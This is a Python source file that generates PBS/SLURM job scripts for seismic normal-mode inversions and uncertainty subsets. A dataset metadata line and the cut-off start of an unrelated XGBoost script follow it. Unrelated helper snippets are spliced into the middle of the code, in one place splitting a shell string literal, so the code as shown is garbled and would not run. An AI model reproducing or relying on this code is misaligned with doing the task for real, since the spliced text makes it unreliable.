setup.bins.rot_ellip))\n\n if len(setup.modes_sc_dst) > 0:\n m += 'echo \" -write_dst\" >> progress.out\\n'\n m += '{write_dst} << EOF\\n'\n for mode, smax in setup.modes_sc.items():\n m += '%s\\n' % smax\n for mode, smax in setup.modes_sc_dst.items():\n m += '%s\\n' % smax\n m += 'EOF\\n\\n'\n m = m.format(write_dst=join(setup.bindir, 
setup.bins.write_dst))\n\n m += 'echo \" -matrixcst\" >> progress.out\\n'\n m += '{mdcpl} << EOF\\n'\n for mode, smax in setup.modes_sc.items():\n # /home/deuss/bin/matrixcst\n # maximum structural deg for every mode\n m += '0 %s\\n' % smax\n if hasattr(setup, 'modes_cc'):\n # /home/deuss/bin/matrixcstC\n for mode, s in setup.modes_cc.items():\n m += '%s %s\\n' % (s[0], s[1])\n m += 'EOF\\n'\n m = m.format(mdcpl=join(setup.bindir, setup.bins.mdcpl))\n\n if len(setup.modes_sc_dst) > 0:\n m += 'mv matrix.dat matrix-cst.dat\\n\\n'\n # /home/deuss/bin/matrixdst\n m += 'echo \" -matrixdst\" >> progress.out\\n'\n m += '{mdcplmq} << EOF\\n'\n for mode, smax in setup.modes_sc_dst.items():\n # /home/deuss/bin/matrixcst\n # maximum structural deg for every mode\n m += '2 %s\\n' % smax\n m += 'EOF\\n'\n m += 'mv matrix.dat matrix-dst.dat\\n\\n'\n m += 'echo \" -addmdcplmq\" >> progress.out\\n'\n m += '{addmdcplmq} << EOF\\n'\n m += 'matrix-cst.dat\\n'\n m += 'matrix-dst.dat\\n'\n m += 'EOF\\n\\n'\n m = m.format(mdcplmq=join(setup.bindir, setup.bins.mdcplmq),\n addmdcplmq=join(setup.bindir, setup.bins.addmdcplmq))\n\n elif setup.intype == 'FSI':\n m = 'cd $sdir\\n'\n m += 'echo \" -mdcpl\" >> $RUNDIR/progress.out\\n'\n m += '{mdcpl} -model {zeromodel} < 0:\n msg += dorun_dst_partials_array(setup)\n msg += dorun_buildATA_array(setup)\n elif setup.intype == 'FSI':\n msg += dorun_fsi_partials_array(setup)\n msg += '\\n'\n msg += 'fi\\n\\n'\n\n if (\n setup.rundir.startswith('/quanta') or\n setup.rundir.startswith('/scratch') or\n setup.scripttype == 'slurm'\n ):\n\n if uncertainties is False:\n pbs_file = 'sbatch_array.sh'\n else:\n pbs_file = 'uncertainties/sbatch_array.sh'\n else:\n pbs_file = 'qsub_array.pbs'\n\n pbs_path = join(setup.rundir, pbs_file)\n with open(pbs_path, 'w+') as fh:\n fh.write(msg)\n os.chmod(pbs_path, 0o777)\n return\n\n\ndef new_script(setup, uncertainties=False):\n \"\"\"\n Creates a pbs script to submit an inversion, using the information\n given in the setup object.\n \"\"\"\n def cat_misfits(setup, uncertainties):\n msg = \"while read event; do\\n\"\n msg += \" weight=`echo $event | awk '{print $NF}'`\\n\"\n msg += \" if [[ $weight =~ ^[+-]?[0-9]+\\.?[0-9]*$ ]]; then\\n\"\n msg += \" EVENT=`echo $event | awk '{print $2}'`\\n\"\n msg += \" else\\n\"\n msg += \" EVENT=`echo $event | awk '{print $NF}'`\\n\"\n msg += \" fi\\n\"\n msg += \" SEGDIR=`echo $event | awk '{print $1}'`\\n\"\n if len(setup.events) > 1:\n msg += '\\tif [ -e $SEGDIR/$EVENT/$EVENT.misfit ]; then\\n'\n msg += '\\t\\tcat $SEGDIR/$EVENT/dobsr.dat >> dobsr.dat\\n'\n msg += '\\t\\tcat $SEGDIR/$EVENT/dobsi.dat >> dobsi.dat\\n'\n msg += '\\t\\tcat $SEGDIR/$EVENT/dsynr.dat >> dsynr.dat\\n'\n msg += '\\t\\tcat $SEGDIR/$EVENT/dsyni.dat >> dsyni.dat\\n'\n msg += '\\t\\tcat $SEGDIR/$EVENT/misfit.dat >> misfit-$SEGDIR.dat\\n'\n msg += '\\t\\tcat $SEGDIR/$EVENT/$EVENT.misfit >> $EVENT.misfit\\n'\n msg += '\\telse\\n'\n msg += '\\t\\techo \"No file: $damp, $iterno, $SEGDIR/$EVENT\" '\n msg += '>> $RUNDIR/progress.err\\n'\n msg += '\\tfi\\n'\n else:\n msg += '\\tif [ -e $RUNDIR/$EVENT/$EVENT.misfit ]; then\\n'\n msg += '\\t\\tcat $RUNDIR/$EVENT/dobsr.dat >> dobsr.dat\\n'\n msg += '\\t\\tcat $RUNDIR/$EVENT/dobsi.dat >> dobsi.dat\\n'\n msg += '\\t\\tcat $RUNDIR/$EVENT/dsynr.dat >> dsynr.dat\\n'\n msg += '\\t\\tcat $RUNDIR/$EVENT/dsyni.dat >> dsyni.dat\\n'\n msg += '\\t\\tcat $RUNDIR/$EVENT/misfit.dat >> misfit.dat\\n'\n msg += '\\telse\\n'\n msg += '\\t\\techo \"No file: $damp, $iterno, $EVENT\" '\n msg += '>> 
$RUNDIR/progress.err\\n'\n msg += '\\tfi\\n'\n if uncertainties is True:\n msg += 'done < $set_name\\n\\n'\n else:\n msg += 'done < allevents\\n\\n'\n return msg\n\n if setup.intype == 'FSI':\n splittingdir = setup.splittingdir\n if splittingdir.startswith('//nfs'):\n splittingdir = splittingdir.replace('//nfs/stig/', '/home/')\n\n if (\n setup.rundir.startswith('/quanta') or\n setup.rundir.startswith('/scratch') or\n setup.scripttype == 'slurm'\n ):\n msg = '#!/bin/bash\\n'\n msg += 'damp=${1}\\n'\n msg += 'iterno=${2}\\n'\n msg += 'ed_it=${3}\\n'\n\n if uncertainties is True:\n msg += 'set_name=${4}\\n'\n msg += 'RUNDIR=${5}\\n'\n msg += 'set_filename=`echo $set_name | '\n msg += \"rev | cut -d'/' -f1 | rev`\\n\"\n else:\n msg += 'RUNDIR=${4}\\n'\n\n else:\n msg = dorun_submission_header(setup, type='depend')\n\n msg += 'cd $RUNDIR\\n'\n msg += 'rm dsyni.dat dsynr.dat dobsi.dat dobsr.dat 2> /dev/null\\n'\n msg += 'rm misfitfiles.in misfit*dat *.misfit 2> /dev/null\\n'\n msg += '\\n'\n if setup.intype == 'FSI':\n msg += 'SPLITDIR=%s\\n' % (splittingdir)\n msg += 'cd $SPLITDIR\\n'\n msg += '#----------------------#\\n'\n msg += '# Concatenate events #\\n'\n msg += '#----------------------#\\n'\n msg += 'echo \" -Concatenate events\" >> $RUNDIR/progress.out\\n'\n\n if setup.intype == 'CST':\n msg += cat_misfits(setup, uncertainties)\n msg += nan_check_misfits()\n if len(setup.events) > 1:\n for segname, sdir in setup.segmentsdir.items():\n msg += 'N=`cat misfit-%s.dat | wc -l`\\n' % segname\n msg += 'if [ $N -gt 0 ]; then\\n'\n msg += '\\techo misfit-%s.dat >> misfitfiles.in \\n' % segname\n msg += 'fi\\n'\n\n elif setup.intype == 'FSI':\n # maybe also cat_misfits here?\n msg += 'while IFS=\" \" read -r SEGDIR EVENT; do\\n'\n msg += 'cat $SEGDIR/$EVENT/dobsr.dat >> $RUNDIR/dobsr.dat\\n'\n msg += 'cat $SEGDIR/$EVENT/dobsi.dat >> $RUNDIR/dobsi.dat\\n'\n msg += 'cat $SEGDIR/$EVENT/dsynr.dat >> $RUNDIR/dsynr.dat\\n'\n msg += 'cat $SEGDIR/$EVENT/dsyni.dat >> $RUNDIR/dsyni.dat\\n'\n msg += 'cat $SEGDIR/$EVENT/misfit.dat >> '\n msg += '$RUNDIR/misfit-$SEGDIR.dat\\n'\n msg += 'cat $SEGDIR/$EVENT/$EVENT.misfit >> '\n msg += '$RUNDIR/$EVENT.misfit\\n'\n msg += 'done < $RUNDIR/allevents\\n\\n'\n for segname, sdir in setup.segmentsdir.items():\n msg += 'echo misfit-%s.dat >> ' % segname\n msg += '$RUNDIR/misfitfiles.in \\n'\n msg += 'cd $RUNDIR\\n'\n\n msg += dorun_misfits_array(setup, uncertainties)\n msg += 'fi\\n'\n msg += '\\n'\n msg += 'if [[ $iterno -ne $ed_it ]]; then\\n'\n msg += 'echo \" End of iteration\" $(($iterno-1)) >> progress.out\\n\\n'\n msg += dorun_addATA(setup, uncertainties)\n msg += dorun_invATA(setup)\n\n if setup.intype == 'CST':\n msg += dorun_mdcpl(setup)\n elif setup.intype == 'FSI':\n segdirs = ''\n for segname, sdir in setup.segmentsdir.items():\n if sdir.startswith('//nfs'):\n sdir = sdir.replace('//nfs/stig/', '/home/')\n segdirs = segdirs + \"%s \" % sdir\n msg += 'for sdir in %s\\n' % segdirs\n msg += 'do\\n'\n msg += 'cd $sdir\\n'\n msg += dorun_mdcpl(setup)\n msg += 'done\\n'\n\n msg += 'else\\n'\n msg += dorun_summary(setup, uncertainties)\n\n if setup.intype == 'CST' and len(setup.segmentsdir) > 1:\n # if uncertainties is True:\n # msg += 'while IFS=\" \" read -r SEGDIR EVENT WEIGHT; do\\n'\n # else:\n # msg += 'while IFS=\" \" read -r SEGDIR EVENT; do\\n'\n msg += \"while read event; do\\n\"\n msg += \" weight=`echo $event | awk '{print $NF}'`\\n\"\n msg += \" if [[ $weight =~ ^[+-]?[0-9]+\\.?[0-9]*$ ]]; then\\n\"\n msg += \" EVENT=`echo $event | awk '{print 
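# The awk/regex logic above tells 'SEGDIR EVENT' lines apart from
# 'SEGDIR EVENT WEIGHT' lines by testing whether the last field is numeric.
# The same rule in Python, for reference (helper name is illustrative):
import re

_NUMERIC = re.compile(r'^[+-]?[0-9]+\.?[0-9]*$')

def parse_event_line(line):
    fields = line.split()
    segdir = fields[0]
    if _NUMERIC.match(fields[-1]):  # trailing weight present
        return segdir, fields[1], float(fields[-1])
    return segdir, fields[-1], None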
$2}'`\\n\"\n msg += \" else\\n\"\n msg += \" EVENT=`echo $event | awk '{print $NF}'`\\n\"\n msg += \" fi\\n\"\n msg += \" SEGDIR=`echo $event | awk '{print $1}'`\\n\"\n msg += ' cat $SEGDIR/$EVENT/$EVENT.misfit >> '\n msg += '$SEGDIR/$EVENT-d$damp.misfit\\n'\n\n if uncertainties is True:\n msg += 'done < $set_name\\n\\n'\n else:\n msg += 'done < allevents\\n\\n'\n elif setup.intype == 'FSI' and len(setup.segmentsdir) > 1:\n msg += 'while IFS=\" \" read -r SEGDIR EVENT; do\\n'\n msg += 'cat $SEGDIR/$EVENT/$EVENT.misfit >> '\n msg += '$SEGDIR/$EVENT-d$damp.misfit\\n'\n msg += 'done < $RUNDIR/allevents\\n\\n'\n msg += 'echo \" End of inversion\" >> progress.out\\n\\n'\n msg += 'fi\\n\\n'\n\n if (\n setup.rundir.startswith('/quanta') or\n setup.rundir.startswith('/scratch') or\n setup.scripttype == 'slurm'\n ):\n if uncertainties is True:\n pbs_file = 'uncertainties/sbatch_new.sh'\n else:\n pbs_file = 'sbatch_new.sh'\n else:\n pbs_file = 'qsub_new.pbs'\n\n pbs_path = join(setup.rundir, pbs_file)\n with open(pbs_path, 'w+') as fh:\n fh.write(msg)\n return\n\n\ndef nan_check_misfits():\n msg = 'count=`grep \"NaN\" $RUNDIR/misfit*.dat | wc -l`\\n'\n msg += 'if [ $count != 0 ]; then\\n'\n msg += ' #stat=`grep -B 3 \"NaN\" $RUNDIR/misfit*.dat | '\n msg += \"cut -d'-' -f1 | cut -d' ' -f1`\\n\"\n msg += ' comp=`grep -B1 \"NaN\" misfit*.dat '\n msg += \"| cut -d'-' -f2 | \"\n msg += 'awk \"NR==1{print $1}\"'\n msg += \" | cut -d'.' -f1`\\n\"\n msg += ' eventid=`grep -B1 \"NaN\" misfit*.dat | '\n msg += \"cut -d'-' -f3 | xargs`\\n\"\n msg += ' echo \"misfit*.dat: NaN found in '\n msg += '$damp $iterno $comp $eventid\" '\n msg += '>> $RUNDIR/progress.err\\n'\n msg += ' echo \" NaN found, next damping\" '\n msg += '>> $RUNDIR/progress.out\\n'\n msg += ' exit 404\\n'\n msg += 'fi\\n\\n'\n return msg\n\n\ndef dependencies_script(setup, uncertainties=False, iter_damp_test=False):\n \"\"\"\n Creates a dependencies script to submit an inversion, using PBS arrays and\n the information given in the setup object.\n \"\"\"\n\n if (\n setup.rundir.startswith('/quanta') or\n setup.rundir.startswith('/scratch') or\n setup.scripttype == 'slurm'\n ):\n msg = dorun_submission_header(setup, uncertainties=uncertainties)\n msg += 'cd $RUNDIR\\n'\n if uncertainties is False:\n msg += 'rm inversion_out/inversion.db 2> /dev/null\\n\\n'\n\n msg += '#----------------#\\n'\n msg += '# DAMPING LOOP #\\n'\n msg += '#----------------#\\n'\n if uncertainties is True:\n msg += 'damp=%s\\n' % setup.damping\n msg += 'while read subset;\\ndo\\n'\n else:\n if iter_damp_test is False:\n msg += 'for damp in %s\\n' % get_damping_string(setup)\n else:\n ds = get_damping_string(setup)\n ds = ds.split()[0] + ' #' + ' '.join(ds.split()[1:])\n msg += 'for damp in %s\\n' % ds\n msg += 'do\\n'\n if setup.intype == 'CST':\n msg += 'bash sbatch_startup.sh ${damp} $RUNDIR\\n\\n'\n elif setup.intype == 'FSI':\n msg += 'cd $RUNDIR\\n'\n msg += dorun_preprundir(setup)\n msg += '\\nN=0\\n'\n sdirs = ''\n for segname, sdir in setup.segmentsdir.items():\n sdirs += \"%s \" % sdir\n\n msg += 'for sdir in %s; do\\n' % sdirs\n\n msg += ' if (( $N >= 48 )); then\\n'\n msg += ' for pid in ${pids[*]}; do\\n'\n msg += ' wait $pid\\n'\n msg += ' pids=${pids[@]/$pid}\\n'\n msg += ' N=$(( N-1 ))\\n'\n msg += ' break\\n'\n msg += ' done\\n'\n msg += ' fi\\n'\n\n msg += ' bash sbatch_startup.sh $sdir &\\n'\n\n msg += ' pids[${N}]=$!\\n'\n msg += ' N=$(( N+1 ))\\n'\n msg += 'done\\n'\n msg += 'wait\\n'\n\n msg += '#------------------------#\\n'\n msg += '# ITERATION 
LOOP START #\\n'\n        msg += '#------------------------#\\n'\n        if iter_damp_test is False:\n            msg += 'ed_it=%s\\n' % (setup.iterations[1]+1)\n        else:\n            msg += 'ed_it=2 #%s\\n' % (setup.iterations[1]+1)\n        it = 'for (( iterno=%s; iterno<=${ed_it}; iterno++ ))\\n'\n        msg += it % (setup.iterations[0])\n        msg += 'do\\n\\n'\n\n        if len(setup.events) == 1:\n            print('read_event_loop.pl will NOT fork correctly!')\n            print('read_event_loop.pl will mix up Set and cmt')\n        msg += '#This part must be parallel\\n'\n        msg += 'echo \" -run events iteration $(( iterno-1 )) / '\n        msg += '$(( ed_it-1 ))\" >> $RUNDIR/progress.out\\n'\n        msg += 'perl read_event_loop.pl '\n        msg += '$RUNDIR allevents 40 $iterno $ed_it $damp\\n'\n        msg += 'wait\\n'\n        # msg += 'if [ $? != 0 ]; then break; fi\\n\\n'\n\n        msg += '\\n# Wait until array finished, then do\\n'\n        if uncertainties is True:\n            msg += 'bash uncertainties/sbatch_new.sh ${damp} ${iterno} '\n            msg += '${ed_it} $subset $RUNDIR\\n\\n'\n        else:\n            msg += 'bash sbatch_new.sh ${damp} ${iterno} ${ed_it} $RUNDIR\\n\\n'\n\n        if setup.rundir.startswith('/quanta'):\n            msg += '\\n# Sync after each iteration\\n'\n            if uncertainties is True:\n                msg += 'cp -r $RUNDIR/uncertainties $MOM/.\\n'\n            else:\n                msg += 'cp -r $RUNDIR/inversion_out $MOM/.\\n'\n            msg += 'cp $RUNDIR/*out $MOM/.\\n'\n            msg += 'cp $RUNDIR/*err $MOM/.\\n'\n\n        # msg += 'if [ $? != 0 ]; then break; fi\\n\\n'\n        msg += '\\n# Check here for NFS errors\\n'\n        msg += \"err_no=`grep 'sqlite3.OperationalError'\"\n        if setup.rundir.startswith('/quanta'):\n            msg += \" $MOM/main*.err | wc -l`\\n\"\n        else:\n            msg += \" $RUNDIR/main*.err | wc -l`\\n\"\n        msg += \"if [[ ! $err_no == 0 ]]; then\\n\"\n        msg += \" echo 'NFS error, sqlite3 cannot write on disk' >> \"\n        msg += \"$RUNDIR/progress.out\\n\"\n        msg += \" exit 1\\n\"\n        msg += \"fi\\n\"\n        msg += 'done\\n'\n\n        if uncertainties is True:\n            msg += 'done < $RUNDIR/uncertainties/subsets\\n'\n        else:\n            msg += 'done\\n\\n'\n        msg += 'mv [0-9]*[A-Z].misfit inversion_out/.\\n'\n        msg += 'rm inversion.dat *misfit* mdcpl.out *.bin '\n        msg += 'mnew* Cmat* Rmat* 2> /dev/null\\n'\n        if setup.keep_all_output is not True:\n            msg += 'ls *dat | xargs -I {{}} find {{}} -type f -not -name '\n            msg += \"'???????.dat' -delete \\n\"\n        if setup.rundir.startswith('/scratch'):\n            src = setup.rundir\n            dst = setup.rundir.replace('/scratch', '/quanta1/home')\n            dst = '/'.join(dst.split('/')[:-1])\n            msg += 'SRC=%s\\n' % (src)\n            msg += 'DST=%s\\n' % (dst)\n            msg += 'mkdir -p %s\\n' % dst\n            msg += 'rsync -r --delete $SRC $DST'\n        if setup.rundir.startswith('/quanta'):\n            if uncertainties is True:\n                msg += 'rsync -r --delete $RUNDIR/uncertainties $MOM/.\\n'\n            else:\n                msg += 'rsync -r --delete $RUNDIR/inversion_out $MOM/.\\n'\n            msg += 'cp $RUNDIR/*out $MOM/.\\n'\n            msg += 'cp $RUNDIR/*err $MOM/.\\n'\n            msg += 'cd ~\\n'\n            msg += 'rm -rf /tmp/$USER\\n'\n\n    elif setup.intype == 'CST' and setup.rundir.startswith('/home'):\n        start1 = \"$(qsub -N %s -v damp=${damp} qsub_startup.pbs)\\n\"\n\n        start2 = \"$(qsub -N %s -v damp=${damp} -W depend=afterok:$OLD \"\n        start2 += \"qsub_startup.pbs)\\n\"\n\n        array = \"$(qsub -N %s -v %s -W depend=afterok:$OLD \"\n        array += \"qsub_array.pbs)\\n\"\n\n        new = \"$(qsub -N %s -v %s -W depend=afterokarray:$ARRAY \"\n        new += \"qsub_new.pbs)\\n\"\n\n        msg = '#!/bin/bash\\n'\n        msg += 'mkdir log\\n'\n        msg += 'st_it=%s\\n' % setup.iterations[0]\n        msg += 'ed_it=%s\\n' % setup.iterations[1]\n        msg += 'ed_it=$(($ed_it+1))\\n'\n        msg += 'count=1\\n'\n\n        var = 'damp=${damp},iterno=${iterno},ed_it=${ed_it}'\n\n        msg += '\\n'\n        msg += 
'#----------------#\\n'\n msg += '# DAMPING LOOP #\\n'\n msg += '#----------------#\\n'\n msg += 'for damp in %s\\n' % get_damping_string(setup)\n msg += 'do\\n'\n name = '%s_startup_d${damp}' % setup.pbsjob\n msg += 'if [[ count -eq 1 ]]; then\\n'\n msg += 'START=' + start1 % name\n msg += 'else\\n'\n msg += 'START=' + start2 % name\n\n msg += 'fi\\n\\n'\n msg += \"STARTID=`echo $START | cut -d' ' -f4`\\n\"\n msg += 'OLD=$STARTID\\n'\n msg += '((count++))\\n'\n msg += '\\n'\n msg += '#------------------------#\\n'\n msg += '# ITERATION LOOP START #\\n'\n msg += '#------------------------#\\n'\n msg += 'for (( iterno=$st_it; iterno<=$ed_it; iterno++ ))\\n'\n msg += 'do\\n'\n\n name = '%s_array_d${damp}_it${iterno}' % setup.pbsjob\n msg += 'ARRAY=' + array % (name, var)\n msg += \"ARRAYID=`echo $ARRAY| cut -d' ' -f4`\\n\"\n msg += 'ARRAY=$ARRAYID\\n'\n name = '%s_new_d${damp}_it${iterno}' % setup.pbsjob\n msg += 'NEW=' + new % (name, var)\n msg += \"NEWID=`echo $NEW | cut -d' ' -f4`\\n\"\n msg += 'OLD=$NEWID\\n'\n msg += 'done\\n'\n msg += 'done\\n'\n\n elif setup.intype == 'FSI' and setup.rundir.startswith('/home'):\n msg = '#!/bin/bash\\n'\n msg += 'mkdir log\\n'\n msg += 'st_it=%s\\n' % setup.iterations[0]\n msg += 'ed_it=%s\\n' % setup.iterations[1]\n msg += 'ed_it=$(($ed_it+1))\\n'\n msg += 'count=1\\n'\n\n var = 'damp=${damp},iterno=${iterno},ed_it=${ed_it}'\n\n modes = ''\n for segname, sdir in setup.segmentsdir.items():\n if sdir.startswith('//nfs'):\n sdir = sdir.replace('//nfs/stig/', '/home/')\n modes = modes + \"%s \" % (sdir)\n\n msg += dorun_preprundir(setup)\n\n msg += '\\n'\n msg += '#----------------#\\n'\n msg += '# DAMPING LOOP #\\n'\n msg += '#----------------#\\n'\n msg += 'for damp in %s\\n' % get_damping_string(setup)\n msg += 'do\\n'\n msg += 'i=0\\n'\n msg += 'for mdir in %s\\n' % (modes)\n msg += 'do\\n'\n msg += 'i=$(($i+1))\\n'\n name = '%s_startup_d${damp}_i${i}' % setup.pbsjob\n msg += 'if [[ count -eq 1 ]]; then\\n'\n msg += 'START=$(qsub -d $mdir -N %s -v damp=${damp} ' % name\n msg += 'qsub_startup.pbs)\\n'\n msg += 'else\\n'\n msg += 'START=$(qsub -d $mdir -N %s -v damp=${damp} ' % name\n msg += '-W depend=afterok:$OLD qsub_startup.pbs)\\n'\n msg += 'fi\\n'\n msg += 'done\\n'\n msg += '((count++))\\n'\n msg += 'OLD=$START\\n'\n msg += 'while qstat -u jagt | grep -e \"*startup_d*_i*\" &> /dev/null\\n'\n msg += 'do\\n'\n msg += 'sleep 10\\n'\n msg += 'done\\n'\n msg += '\\n'\n msg += '#------------------------#\\n'\n msg += '# ITERATION LOOP START #\\n'\n msg += '#------------------------#\\n'\n msg += 'for (( iterno=$st_it; iterno<=$ed_it; iterno++ ))\\n'\n msg += 'do\\n'\n name = '%s_array_d${damp}_it${iterno}' % setup.pbsjob\n msg += 'ARRAY=$(qsub -N %s -v %s ' % (name, var)\n msg += '-W depend=afterok:$OLD qsub_array.pbs)\\n'\n msg += '\\n'\n\n name = '%s_new_d${damp}_it${iterno}' % setup.pbsjob\n msg += 'NEW=$(qsub -N %s -v %s ' % (name, var)\n msg += '-W depend=afterokarray:$ARRAY qsub_new.pbs)\\n'\n msg += 'OLD=$NEW\\n'\n msg += 'done\\n'\n msg += 'done\\n'\n\n if uncertainties is True:\n file_name = 'submit_uncertainties.sh'\n else:\n file_name = 'submit_dependencies.sh'\n\n file_path = join(setup.rundir, file_name)\n with open(file_path, 'w+') as fh:\n fh.write(msg)\n return\n\n\ndef pbsrundir_sanity_check(rundir):\n pbsrundir = rundir\n\n if pbsrundir.startswith('//nfs'):\n pbsrundir = pbsrundir.replace('//nfs/stig/', '/home/')\n #\n # if len(pbsrundir) > 45:\n # pbsrundir = '\"%s\"\\\\\\n\"%s\"' % (pbsrundir[0:46], pbsrundir[46:])\n return 
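# The qsub chains above hinge on capturing each job id and feeding it to
# the next submission via '-W depend=afterok:'. Driven from Python instead
# of bash, the pattern looks roughly like this; how the id is parsed out
# of qsub's stdout is cluster-specific:
import subprocess

def qsub(script, name, depend=None):
    cmd = ['qsub', '-N', name]
    if depend is not None:
        cmd += ['-W', 'depend=afterok:%s' % depend]
    cmd.append(script)
    out = subprocess.check_output(cmd).decode()
    return out.split()[0]  # on TORQUE the job id is the first token

# usage sketch:
# jid = qsub('qsub_startup.pbs', 'startup')
# qsub('qsub_array.pbs', 'array', depend=jid)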
pbsrundir\n\n\ndef write_segment_files(mode, path=None, verbose=False):\n    if path is None:\n        path = '/quanta1/home/simons/splitting/modes/'\n        path += mode\n\n    comps = ['R', 'T', 'Z']\n\n    for c in comps:\n        if c == 'Z':\n            seg = read_seg('db', channel=c, modes=format_name(mode).upper(),\n                           min_snr=2)\n        else:\n            seg = read_seg('db', channel=c, modes=format_name(mode).upper(),\n                           min_snr=1.5)\n\n        if verbose:\n            print(seg)\n        os.chdir(os.path.join(path, \"segments_%s\" % c))\n        seg.write('', eventfiles=True, overwrite=True, format='segment')\n\n    return\n\n\ndef uncertainties_dir(setup, remove_existing=False, boot_strap=False,\n                      jack_knive=True, size_of_subsets='full',\n                      N_of_subsets=200, allevents_subset_ratio=None,\n                      verbose=False):\n    \"\"\"\n    Creates the uncertainties directory specified for setup.rundir\n    \"\"\"\n    if exists(join(setup.rundir, 'uncertainties')):\n        if remove_existing is True:\n            shutil.rmtree(join(setup.rundir, 'uncertainties'))\n        else:\n            raise IOError('uncertainties directory exists!')\n    os.makedirs(join(setup.rundir, 'uncertainties'))\n\n    src = join(setup.nmpydir, mergepath)\n    dst = join(setup.rundir, \"merge.py\")\n    shutil.copy(src, dst)\n\n    with open(join(setup.rundir, 'allevents'), 'r') as fh:\n        allevents = fh.readlines()\n\n    file_subset_list = join(setup.rundir, 'uncertainties', 'subsets')\n    subset_list = []\n\n    N = len(allevents)\n    if verbose:\n        msg = '%s events read' % N\n        print(msg)\n\n    subsets = []\n    wo_cmt = []\n    cmt_list = ['031111B', '122604A', '022710A', '032805D', '062301E', '060994A',\n                '100494B', '081918A', '052413A', '031111Q', '122604Q', '022710Q',\n                '032805Q', '062301Q', '060994Q', '100494Q', '052413Q']\n\t\t # '092503C', '081977B', '111506F', not needed\n\n    if boot_strap is True:\n        if size_of_subsets == 'full':\n            size_of_subsets = N\n\n        if size_of_subsets > N:\n            size_of_subsets = N\n\n        # Nrange = int(round(N/10.))\n        N_cmt = 0\n\n        for cmt in cmt_list:\n            w_cmt = [x for x in allevents if cmt in x]\n            if len(w_cmt) == 0:\n                continue\n            wo_cmt = set(allevents) - set(w_cmt)\n            c = list(wo_cmt)\n            c = [[item.rstrip() + ' ' + str(c.count(item))][0] for item in c]\n            subsets += [c]\n            N_cmt += 1\n\n        for i in range(N_of_subsets-N_cmt):\n            try:\n                c = np.random.choice(wo_cmt, size=size_of_subsets,\n                                     replace=False).tolist()\n            except ValueError:\n                if verbose is True:\n                    print('size larger than allevents, replace set to True')\n                c = np.random.choice(allevents, size=size_of_subsets,\n                                     replace=True).tolist()\n            c = [[item.rstrip() + ' ' + str(c.count(item))][0] for item in c]\n            c = list(set(c))\n            subsets += [c]\n\n    elif jack_knive is True:\n        # jack_knive should only remove one event at a time, nothing fancy\n        allevents = [e.rstrip() for e in allevents]  # removing linebreak\n        N_all = len(allevents)\n        subsets = []\n\n        if N_all < 20:\n            for i, item in enumerate(allevents):\n                subsets += [allevents[0:i] + allevents[i+1:]]\n        else:\n            # This loop creates subsets with only one event removed,\n            # chosen from cmt_list\n            for cmt in cmt_list:\n                w_cmt = [x for x in allevents if cmt in x]\n                wo_cmt = set(allevents) - set(w_cmt)\n                subsets += [list(wo_cmt)]\n            if verbose:\n                msg = '%s fixed subsets created' % len(subsets)\n                print(msg)\n\n            if N_of_subsets > N_all:\n                N = N_all\n            else:\n                N = N_of_subsets\n\n            if allevents_subset_ratio is not None:\n                size = int(allevents_subset_ratio * N_all)\n            else:\n                if size_of_subsets > N_all:\n                    size = N_all - 1\n                else:\n                    size = size_of_subsets\n\n            delta = int(abs(len(allevents) - size))\n            if verbose:\n                print('delta : %i' % delta)\n
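# For comparison, the textbook leave-one-out jackknife (the N_all < 20
# branch above); the block-deletion loop that follows below removes
# 'delta' events at a time instead, to keep the number of subsets
# manageable for large event lists:
def jackknife_subsets(events):
    return [events[:i] + events[i + 1:] for i in range(len(events))]

# jackknife_subsets(['A', 'B', 'C']) -> [['B', 'C'], ['A', 'C'], ['A', 'B']]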
            i = 0\n            while True:\n                if i+delta > len(allevents):\n                    break\n                c = list(set(allevents) - set(allevents[i:i+delta]))\n                subsets += [c]\n                i = i + delta\n    if verbose:\n        msg = '%s subsets created in total' % len(subsets)\n        print(msg)\n\n    for i, subset in enumerate(subsets):\n        fname = join(setup.rundir, 'uncertainties', \"allevents_%s\" % (i+1))\n        # if verbose:\n        #     print('subsets: %s' % fname)\n        with open(fname, 'w') as fh:\n            for line in subset:\n                fh.write(\"%s\\n\" % line)\n        with open(file_subset_list, 'a') as fh:\n            subset_list += [fname]\n            fh.write(\"%s\\n\" % fname)\n\n    setup.uncertainties['files'] = subset_list\n\n    return setup\n\n\ndef uncertainties_script(setup, damping):\n    \"\"\"\n    creates:\n        submission script:\n            PATH/submit_uncertainties.sh\n\n        new allevents files, containing the subsets:\n            PATH/uncertainties/allevents_1-*\n\n        List of the paths to these files:\n            PATH/uncertainties/subsets\n\n        modified sbatch_new.sh script:\n            PATH/uncertainties/sbatch_new.sh\n\n    \"\"\"\n    setup.damping = damping\n    setup.uncertainties['damping'] = damping\n    dependencies_script(setup, uncertainties=True)\n    new_script(setup, uncertainties=True)\n    array_script(setup, uncertainties=True)\n\n    return setup\n","sub_path":"frospy/core/setup/create.py","file_name":"create.py","file_ext":"py","file_size_in_byte":85179,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"243592696","text":"# coding: utf-8\n__author__ = 'ZFTurbo: https://kaggle.com/zfturbo'\n\n# Changes:\n# Refactored to use DataLoader and Predictor classes\n\n# TODO\n# Want to improve score -- 0.83 -- and considering any of\n# - tweak xgboost\n# - add alternative algorithm\n# - use more/different features\n\n\nimport datetime\nimport pandas as pd\nimport numpy as np\nfrom sklearn.cross_validation import train_test_split\nimport xgboost as xgb\nfrom operator import itemgetter\nfrom sklearn.metrics import roc_auc_score\nimport time\n\n\nclass XGBooster:\n    fmap_fname = 'xgb.fmap'\n\n    def _create_feature_map(self, features):\n        with open(self.fmap_fname, 'w') as outfile:\n            for i, feat in enumerate(features):\n                outfile.write('{0}\\t{1}\\tq\\n'.format(i, feat))\n\n    def _get_importance(self, gbm, features):\n        self._create_feature_map(features)\n        importance = gbm.get_fscore(fmap=self.fmap_fname)\n        importance = sorted(\n            importance.items(), key=itemgetter(1), reverse=True\n        )\n        return importance\n\n    def run_test(self, train, test, features, target, random_state=0):\n        eta = 0.1\n        max_depth = 5\n        subsample = 0.8\n        colsample_bytree = 0.8\n        start_time = time.time()\n\n        print('XGBoost params. 
